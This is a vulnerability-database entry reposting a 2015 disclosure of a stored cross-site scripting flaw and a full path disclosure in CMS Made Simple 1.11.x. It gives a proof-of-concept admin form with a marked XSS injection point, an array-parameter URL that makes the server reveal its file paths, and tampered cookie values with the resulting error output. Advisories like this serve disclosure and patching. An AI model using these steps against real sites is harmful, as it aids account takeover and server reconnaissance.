Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cms madesimple 1.11.12 - Persistant XSS / Full Path Disclosure Vulnerabilities

🗓️ 11 Oct 2015 00:00:00Reported by ZwXType 
zdt
 zdt🔗 0day.today👁 26 Views

Stored XSS and Full Path Disclosure in CMS MadeSimple 1.11.1

Code
# Author : ZwX
# Date : 09/02/2015
# Download : http://www.cmsmadesimple.fr/telecharger-cms
# Vendor : http://www.cmsmadesimple.fr/
# Tested on : Windows 7 

+=====================+
     Description : 
+=====================+

Stored Cross Site Scripting vulnerability that is discovered in the user login interface.
Module : (Manage Shortcuts) and click (Add Shortcut)

+=====================+
  Proof Of Concept : 
+=====================+

<form method="post" action="addbookmark.php?_sx_=9136d3ce1a6e559c">
<input type="hidden" name="_sx_" value="9136d3ce1a6e559c" />
<div class="pageoverflow">
<p class="pagetext">Title:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="[XSS Stored Here]" /></p>
<input type="hidden" name="addbookmark" value="true" />
<input type="submit" value="Submit" class="pagebutton" />
<input type="submit" name="cancel" value="Cancel" class="pagebutton" />
</div>
</form>

+=====================+
     Description : 
+=====================+

# A vulnerability displays the full path to the vulnerable script while indicating the type of vulnerability:
trim()

# Vulnerability lies in the page.functions.php file

+=====================+
  Proof Of Concept : 
+=====================+

/index.php?page[]=minimal-template

Results : Warning: trim() expects parameter 1 to be string, array given in 
          C:\Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\lib\page.functions.php on line 803
		  
Injection TamperData Cookie : 

_sx_=f07a39ba13846fce; 
cms_admin_user_id=1; 
cms_passhash=02d21a40e06c430127cca40a20243f22; 
PHPSESSID=jihp50tjff0kdkqjdnelkmmig4; CMSSESSID1ae59f24=//setcookie()

Results : Warning: session_start(): 
          The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:
		  \Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\include.php on line 50  
	

[#] 09/02/2015: Vulnerability found
[#] 09/02/2015: Vendor informed
[#] 16/02/2015: No new vendor
[#] 16/02/2015: Vulnerability disclosure

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Oct 2015 00:00Current
7.1High risk
Vulners AI Score7.1
cms madesimplestored xssfull path disclosureuser loginmanage shortcutsadd shortcutpage.functions.phpvulnerabilityproof of conceptwindows 7vendorinjection tamperdata cookie
26